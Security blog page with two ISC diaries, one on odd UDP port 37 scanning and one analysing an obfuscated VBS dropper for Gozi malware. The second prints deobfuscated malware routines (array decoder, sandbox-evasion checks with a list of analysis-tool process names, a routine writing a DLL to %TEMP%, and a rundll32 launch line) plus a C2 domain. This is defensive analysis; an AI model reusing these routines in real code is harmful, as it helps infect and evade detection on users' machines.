SANS Internet Storm Center
Threat Level: green. Handler on Duty: Jim Clausing
Last Daily Podcast (Fri, Jun 4th): Zoom CIS Benchmark @boeke; BIG-IP Vuln; WE.LOCK Vuln; 2x WordPress Plugin Vuln
LATEST DIARIES
STRANGE GOINGS ON WITH PORT 37
Published: 2021-06-03. Last Updated: 2021-06-05 02:45:21 UTC. By Jim Clausing (Version: 1). 0 comment(s)
Similar to Yee Ching's diary on Thursday, I noticed an oddity in the DShield data last weekend (which I had hoped to discuss in a diary on Wednesday, but life got in the way) and thought it was worth asking around to see if anyone knows what is going on. As soon as I saw it, I reconfigured my honeypots to try to capture the traffic, but wasn't able to. I'm always very interested when I see some of the legacy ports and protocols pop up. In this case, port 37 is the Time protocol (RFC 868), which runs over both TCP and UDP and is one of the many small services that used to run on the low ports of the Unix machines I administered back in the 1980s and 1990s. In recent years most operating systems have disabled these services, since they seemed to be used only for DDoS purposes. On Thursday, I took another look at the graph.
By default we normally show only Targets/Day and Sources/Day, but I've added Reports/Day and TCP Ratio for this analysis. The first thing I noticed was the huge spike in reports. Our baseline was in the 200-500 reports/day range, but on 26 May this jumped to around 46,000, so someone was looking very actively. The other oddity was that prior to the spike nearly all of the probes were TCP, but from 25 May to 2 Jun nearly all of the traffic was UDP (the gold line on the graph above ranges from 0 = all UDP to 100 = all TCP); that then disappeared and the port returned to mostly TCP probes on 3 Jun, when I took this snapshot. Since I was unable to capture any of the packets, I don't know whether there was some unusual payload that might have shed light on the purpose of this activity. The total number of sources was still fairly small, ranging from a low of 69 on 25 May to 176 on 2 Jun. Meanwhile the number of targets ranged from 156 on 25 May to almost 700 on 27 May, which is right in the range we've seen for the past 10 months (there was a flurry of activity on the port last June and July that regularly spiked to 2400-2500 targets, not shown in the graph above). So I'm not sure what to make of it, especially without any packets. If any of you managed to capture any of this traffic last weekend or early this past week and care to share, we'd love to have a look. Otherwise, if you have any insight into what was going on, please share below or via our contact form. I'm always very curious about these traffic oddities.
---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc sans (dot) edu
Keywords: udp port 37
0 comment(s)
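The per-day view used above (reports, distinct sources, distinct targets and the TCP ratio on the gold line) is easy to reproduce on your own sensor logs, and if you do manage to capture port 37 payloads you will want to know whether they are genuine RFC 868 exchanges or something else. The Python below is an added example, not code from the diary or from DShield: the records are constructed (RFC 5737 documentation addresses, not real sensor data), the record layout is an assumption, and the payload handling follows RFC 868 (an empty datagram is the client request; a reply is exactly 4 bytes, a big-endian count of seconds since 1900-01-01 UTC).

```python
"""Per-day summary of port-37 probe records plus RFC 868 payload decoding.
Added example, not code from the ISC diary; the records below are
constructed for the demonstration and are not DShield data."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone
import struct

# Constructed records: (day, source_ip, target_ip, protocol, payload_hex).
# Addresses are from the RFC 5737 documentation ranges; the layout is an assumption.
SAMPLE_RECORDS = [
    ("2021-05-24", "198.51.100.7",  "203.0.113.10", "tcp", ""),
    ("2021-05-24", "198.51.100.7",  "203.0.113.11", "tcp", ""),
    ("2021-05-25", "198.51.100.9",  "203.0.113.10", "udp", ""),
    ("2021-05-25", "198.51.100.9",  "203.0.113.12", "udp", ""),
    ("2021-05-25", "198.51.100.9",  "203.0.113.13", "udp", "e4580e00"),
    ("2021-05-25", "198.51.100.20", "203.0.113.10", "tcp", ""),
]


def summarize_by_day(records):
    """Reports, distinct sources, distinct targets and TCP ratio per day.
    The ratio matches the diary's gold line: 0 = all UDP, 100 = all TCP."""
    days = defaultdict(lambda: {"reports": 0, "sources": set(), "targets": set(), "tcp": 0})
    for day, src, dst, proto, _payload in records:
        d = days[day]
        d["reports"] += 1
        d["sources"].add(src)
        d["targets"].add(dst)
        if proto.lower() == "tcp":
            d["tcp"] += 1
    return {
        day: {
            "reports": d["reports"],
            "sources": len(d["sources"]),
            "targets": len(d["targets"]),
            "tcp_ratio": round(100 * d["tcp"] / d["reports"]),
        }
        for day, d in sorted(days.items())
    }


RFC868_EPOCH = datetime(1900, 1, 1, tzinfo=timezone.utc)


def classify_time_payload(payload: bytes):
    """Classify a port-37 payload per RFC 868.
    - empty: a client request (a server answers on receipt; from a honeypot's
      point of view this is indistinguishable from a plain scan)
    - exactly 4 bytes: a reply, big-endian seconds since 1900-01-01 UTC
    - anything else: not the TIME protocol, worth a closer look"""
    if len(payload) == 0:
        return ("request", None)
    if len(payload) == 4:
        (secs,) = struct.unpack("!I", payload)
        return ("reply", RFC868_EPOCH + timedelta(seconds=secs))
    return ("other", None)


def decode_payloads(records):
    """Classify the payload of every record; returns the list of kinds."""
    return [classify_time_payload(bytes.fromhex(p))[0] for *_, p in records]


if __name__ == "__main__":
    for day, stats in summarize_by_day(SAMPLE_RECORDS).items():
        print(day, stats)
    print(classify_time_payload(bytes.fromhex("e4580e00")))
```

On the constructed data the first day is 100% TCP and the second drops to 25%, which is the kind of swing the gold line showed; the one 4-byte payload decodes to 2021-05-26 00:00:00 UTC, so a capture that contained it would look like a legitimate TIME reply rather than a probe.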
RUSSIAN DOLLS VBS OBFUSCATION
Published: 2021-06-04. Last Updated: 2021-06-04 05:01:36 UTC. By Xavier Mertens (Version: 1). 0 comment(s)
We received an interesting sample from one of our readers (thanks Henry!) and we like this one. If you find something interesting, we are always looking for fresh meat! Henry's sample was delivered in a password-protected ZIP archive and the file was a VBS script called "presentation_37142.vbs" (SHA256: 2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f). I uploaded a copy of the file to MalwareBazaar. When you open it, you immediately spot the first obfuscation technique used: character encoding, but also a lot of junk comments (to make the code harder to read). So, first, let's get rid of the comments (they are present in both formats, "REM" and a single quote):

    root@remnux:/MalwareZoo/20210603# egrep -v "^(REM|')" presentation_37142.vbs > presentation_37142.vbs.nocomments

When you look at the cleaned file, you see some calls that execute the result of a function limpet(). Indeed, further down in the code, we find the function:

    Function limpet(hmx)
        chivalrous=1:pbI=9
        KONQLa = lbound(hmx)
        OOSUF = ubound(hmx)
        for judicious = KONQL to OOSUF
            Randomize
            if hmx(judicious) = 999999 Then
                Talmud = Talmud & ChrW(Int((chivalrous-pbI+1)*Rnd+pbI))
            Else
                Talmud = Talmud & ChrW(hmx(judicious) - (((5965 - (12 - 6.0)) - 292.0) - 5660.0))
            End if
        Next
        limpet = Talmud
    End Function
It's used to decode the arrays of integers that we find in the file. The arithmetic expression evaluates to 7, so each integer is simply a character code shifted up by 7; the special value 999999 inserts a pseudo-random character (code 2 to 9) as noise. We can try to replace all the execute() calls with Wscript.Echo() and run the file.

We decoded more pieces of the script, but we see that it fails on the line "ELvv". We can see a bunch of strings at the end of the script:

    ELvv
    QSV
    Zme
    numb
    TdJb
    RGOD
    bRDW
    tawny
    baronial
    PRJh
    ERa
Those functions are created when the strings are deobfuscated by limpet() and executed. Here is an example:

    Function ELvv()
        GewqX("DEBUG: FS_FCH - Start")
        on error resume next
        Dim chivalrous,pbI
        chivalrous=5000
        pbI=2000
        Randomize
        WScript.Sleep Int((chivalrous-pbI+1)*Rnd+pbI)
        Set setupService = GetObject("winmgmts:\\.\root\cimv2")
        Set judiciouslItems = setupService.ExecQuery("Select * from Win32_LogicalDisk")
        For Each inhwg In judiciouslItems
            Ppli = Ppli + Int(inhwg.Size / (39 + ((22 + (-17.0)) + (1073741782 - 2.0))))
        Next
        If round(Ppli) < (((7 + 27.0) + (-19.0)) + (6208 - 6173.0)) Then
            GewqX("DEBUG: FS_FCH - False")
            Ldj
        End If
        GewqX("DEBUG: FS_FCH - True")
    End Function

The obfuscated arithmetic hides plain constants: the script first sleeps for a random 2 to 5 seconds, the divisor is 1073741824 (2^30, so the Win32_LogicalDisk sizes are summed in GiB), and the threshold is 50. If the logical disks of the machine add up to less than 50 GiB, the check fails and Ldj is called.
Do you remember all the arrays of integers in the original script? Not all of them were followed by an execute(), because they are used in another array inside a deobfuscated function:

    Function PRJh()
        GewqX("DEBUG: F_DROPPED - Start")
        Dim osteopathic:Set osteopathic = CreateObject("ADO"+"DB.S"+"tr"+"eam")
        With osteopathic
            .Type = 2
            .Charset = "ISO-8859-1"
            .Open()
            For Each codeposit in Array(rUM, dPO, XRbN, yrs, niTC, zVpd, FwV, FCp, bQec, SRtOv, bASM, Nys, GuUuW, WeK, wpzJ, YHKZ, JnPu, oAS, oaC, zlwL, pKkq, NXmo, QTrX, Flut, nAkRy, HRQyY, zzTHn, Csg, omBk, xJrCx, IsEW, XYJUj, NeJ, PxnF, DXx, QvkW, DnNcg, RnDr, vHgx, Ynwg, wfG, aOaUo, HiKrS, xQB, bLErk, COtj, ATRrc, sxLK, Dyj, sDZ, BmUn, jLX, FgF, uhE, dBtN, gaVt, xBJ, PuiTq, btwV, avhtp, hNd, IZh, vJMC, Sqi, saJ, svVXu, qJI, SXft, KIpu, izb, yYY, MtIz, KdoAK, ALd, QJwqG, xisN, sexYP, irJ, NCI, SBma, AQpP, FOz, nVmL, RRB, JIBYA, WfhqI, aQQN, udc, Xvle, OFMs, awj, udzh, OwA, hkgk, SxR, thlD, UXOkn, LKR, TfsoC, wSCJ, cVANb, uZO, BAOxQ, uPPY, BfW, hle, rsdR, QoZkT, Tua, aFr, GCLj, HJy, EGFrK, ppp, ArQcy, LaK, ByYn, ZyPzH, onTV, gARY, HCXTl, ZVt, nKEv, PtaK, eti, hrKE, eXwev, ddDZ, xyN, zCGr, BpvU, lmO, QMl, iZA, bvLfp, GWOG, qWtY, oin, fUDXE, bMSg, uGYU, SMa, GSS, TURRX, vvGy, EiM, BzYH, opQ, OOH, mpKJ, HPnoY, TtJsn, Jdx, DaTI, gdf, xHl, mjF, YnD, KWsA, UrvS, RUkY, szER, tIGWz, UuOZ, kCg, BPiH, ZJS, Met, KVkoD, tdLQ, opJ, CxK, hDX, OqOhw, GJPId, QkuF, jEm, bMjTD, Wfm, qnv, iwX, bPdD, nbva, CcdOc, iEvqT, PTwoC, AjDE, NURs, CXQc, hkGY, QENnM, gIpa, bVf, nNh, CBrt, jiJE, Szoen, qRa, UmwG, dmPCT, xBTPw, mJzrP, hWgcR, kOgs, DINkp, blA, lalRK, UgQmB, gQgs, ZGLuf, GpTw, NKSF, GEya, Szw, sut, mee, MGuCv, pAhj, mhgP, lWqmb, pAD, Eiyd, dCn, DbcQR, rhscz, ARgF, wFpS, MGv, Aqtuc, gfqu, LqY, Iph, MxzQ, QUT, CLzUD, ShzgE, SCr, gSu, BgGX, fEyv, nzHHg, JAtaq, EtUo, tOR, BLo, nlKy, QIKP, QTPI, JorR, Mqo, Qyut, Ekfe, MhvQF, ZtRzU, LjOgB, VyK, Bluo, POGf, nmMl, OwLN, KHn, dbsnZ, qMMuW, DInM, MlbSL, HbS, SVr, Harw, Srd, cLL, EDW754, UajxU, uFp, vCgaf, OFg, JsVin, NIuAD, OVz, veT, EzdVL, DFZgp, WfrR, NCP, sZb, xaCQ, OvD, iXS, OLez, YaIjt, hLDNJ, DMhMf, oRpL, zaY, Cfu, jwt, wRux, WFR, xmAW, Jng, TxJ, YSB, tRDsh, lerhk, cHFw, TqDMb, VEt763, zvJ, zsz, qbO, tvqtX, JFWO, Yvz, lFsX, OtLxd, KiBDP, bfK, Hvp, Kjih, WUCEg, HdTbW, WZPn, lJiok, pAuh, MBqS, grwz, aPsWo, QGdkF, Zig, BvB, AeSnp, pnZl, LEsr, yFS, eJkhN, ozCs, sPP, DpyGu, dJv, ram, fzpK, XAfht, nXB, EoaJ, dhZeR, xwuE, uyB, afK, LVQk, Niqn, FxJFC, wfUhd, kdBo, eqj, CiF, DDMRO, OTj, xnZ842, ADSM, aEQ, hqB, lrBWH, RnGp, xSeG, EOZI, QmScs, VPcRZ, lZOaQ, kCQM, RKE, dMO, LKGwR, RkVx, bPxAv, mmnQO, wSoiq, Mzm, ZEYEP, yqcY, QwCor, XWazl, kYRx, toCiV, nhELZ, kcSLs, oTBxY, DgxmU, ibw, mpkq, aaTTR, LnjuS, wOH, AZL, MdUpB, WzA, yQbeO, cTz, HhpIT, hUDb, TJr, SYw, mTQ, Ncm, Qackb, DBOpx, zUt, jDFf, NQH, EPu, qDh, rWwx, ecbWb, nmVbz, BCH, JfEdB, upm, Aek, SXLUH, kim, XjXMj, OEcx, nJpLa, bqVTd, Tsg, MOA, dBci, YUM, eFa, wQN, TXDP, uHmt, rxW, EcOhJ, KcK, ZetI, RXEK, Imq, LFfk, aWTf, dJklK, DCY, DzPVT, WkK, lmeb, VXy, hmaUa, XsV, tlPuy, KCWj, weqD, gEd574, cRWmH, uyxS, HCm, XtMnx, lijm, uAT, gexWJ, ZQs, VvCEp, pgvCk, LsJh, ySkqT, Kzwtv, gTcM, bhLVG, bMtx, oBA, pCpHo, JhwuT, tmCJ, FlnBx, CWGT, Rzj, wQPJ, JLxr, ueiX, rdbX, DuxK, cszZ, Rbg, UeK, uYU, LeIZq, hBUp, vKTFA, MIY, zCD, XtGy, OLU, Umr, WBWsH, SIjEe, wblv, IXnk, ruRbR, aNW, nJdCW, XexJB, GbZ, Coz, gdp, qtjKq, iUFUB, NlaC, rLNFl, pleE, bma, iyDD, ElvJ, AkGP, Kmv, VQI, dgbHA, bAA, AgU, YTABm, gXjXx, DYm, dXuBM, tFLpx, BqiQ, FgOOF, dHJ, zTKGi, xitWR, htZix, pvn, MVI, gsN, Mpa, Czx, FZf, kyX, uNzIl, zhcBS, yOFY, fPn, qPPJ)
                .WriteText limpet(codeposit)
            Next
            .Position = 0
            .SaveToFile sandhill + "racial.drc", 2
            .Close
        End With
        GewqX("DEBUG: F_DROPPED - True")
    End Function
That's why I called it the "Russian Dolls" technique: we have arrays of data used by arrays of data, and so on. Let's execute the function PRJh() and dump the file to disk: racial.drc (SHA256: 77E706F98B1E4FE48A4A1631B27529DC587AEAB2D187322439D3B5A726DA2F80). It's a DLL with only one export: DllRegisterServer. But first, let's check the other functions in the VBS script:

* ELvv checks the disk size (the sum of all logical disks, see above)
* QSV checks the number of CPUs (cores)
* Zme checks the available memory
* numb checks for interesting running processes
* TdJb checks the uptime
* RGOD checks files in %TEMP%
* baronial creates a file called "adobe.url" in %TEMP% which points to https://adobe.com (?)

We have here classic sandbox/virtualization detection techniques. Here is the list of processes searched for by numb:

    Brenner = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")

The function ERa runs the dumped DLL with rundll32:

    avlt = "rundll32" + " " + sandhill + "racial.drc" + ",DllRegisterServer":setupService.create avlt

This DLL is part of the Gozi malware family and communicates with a C2 server located at authdferonokcom.
To conclude, the VBS script has some debugging code implemented via a specific function:

    GewqX("DEBUG: F_MESSAGE - Start")

The function is simple:

    Function GewqX(victrola)
        If (InStr(WScript.ScriptName, cStr(82984)) > 0 And ucMHV = 0) Then
            MsgBox(victrola)
        End If
    End Function

The debug messages are shown only if the script filename contains the substring "82984" (and ucMHV is 0).
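Rather than letting the script run with execute() swapped for Wscript.Echo(), the integer arrays can be decoded statically. The Python below is an added example, not the diary's code or the malware's: it reimplements limpet() with the constant already folded (the obfuscated arithmetic evaluates to 7), strips REM and single-quote comment lines the way the egrep command above does, and pulls every integer Array(...) literal out of the script. The embedded VBS text and the encoder that builds it are constructed for the demonstration (the real sample's array layout is assumed to be `name = Array(n, n, ...)`), and the noise marker 999999 is dropped rather than replaced by a random control character, since it carries no information.

```python
"""Static decoder for limpet()-style integer arrays in the VBS sample.
Added example, not code from the ISC diary; SAMPLE_VBS below is constructed
for the demonstration and is not the real malware."""
import re

SHIFT = 7             # (((5965 - (12 - 6.0)) - 292.0) - 5660.0) in the VBS evaluates to 7
NOISE_MARKER = 999999  # limpet() emits a random character (code 2..9) for this value


def decode_limpet(values, noise=""):
    """Python equivalent of limpet(): every integer minus SHIFT is a character
    code; NOISE_MARKER entries become `noise` (empty by default, so the
    decoding is deterministic for analysis)."""
    out = []
    for v in values:
        if v == NOISE_MARKER:
            out.append(noise)
        else:
            out.append(chr(v - SHIFT))
    return "".join(out)


def strip_comments(vbs_text):
    """Drop lines that are only junk comments (REM ... or ' ...), like
    egrep -v "^(REM|')" but tolerant of leading whitespace."""
    return "\n".join(
        line for line in vbs_text.splitlines()
        if not re.match(r"^\s*(REM\b|')", line, re.IGNORECASE)
    )


# Assumed shape of the obfuscated literals: name = Array(94, 90, ...)
ARRAY_RE = re.compile(r"(\w+)\s*=\s*Array\(\s*([\d\s,]+?)\s*\)", re.IGNORECASE)


def extract_arrays(vbs_text):
    """Return {name: [ints]} for every Array(...) literal made only of integers."""
    found = {}
    for name, body in ARRAY_RE.findall(vbs_text):
        found[name] = [int(x) for x in body.replace("\n", " ").split(",") if x.strip()]
    return found


def decode_all(vbs_text):
    """Strip comments, find the integer arrays and decode each one."""
    return {
        name: decode_limpet(values)
        for name, values in extract_arrays(strip_comments(vbs_text)).items()
    }


def encode_limpet(text, noise_every=0):
    """Inverse of decode_limpet(); used only to build the constructed sample."""
    values = []
    for i, ch in enumerate(text, 1):
        values.append(ord(ch) + SHIFT)
        if noise_every and i % noise_every == 0:
            values.append(NOISE_MARKER)
    return values


# Constructed stand-in for the cleaned script: two junk comments, one encoded array.
SAMPLE_VBS = "\n".join([
    "REM junk comment",
    "' more junk",
    "rUM = Array(" + ", ".join(map(str, encode_limpet('WScript.Echo "hello"', noise_every=5))) + ")",
    "execute(limpet(rUM))",
])

if __name__ == "__main__":
    for name, plaintext in decode_all(SAMPLE_VBS).items():
        print(name, "=>", plaintext)
```

Arrays that decode to readable VBS are the staged functions (ELvv, PRJh and friends); arrays that decode to binary garbage are the chunks PRJh concatenates into racial.drc, so the same pass separates the two kinds of Russian doll without ever executing the script.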
https://bazaar.abuse.ch/sample/2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f/
https://bazaar.abuse.ch/sample/77e706f98b1e4fe48a4a1631b27529dc587aeab2d187322439d3b5a726da2f80/
https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Keywords: DLL Gozi Malware Obfuscation VBS
0 comment(s)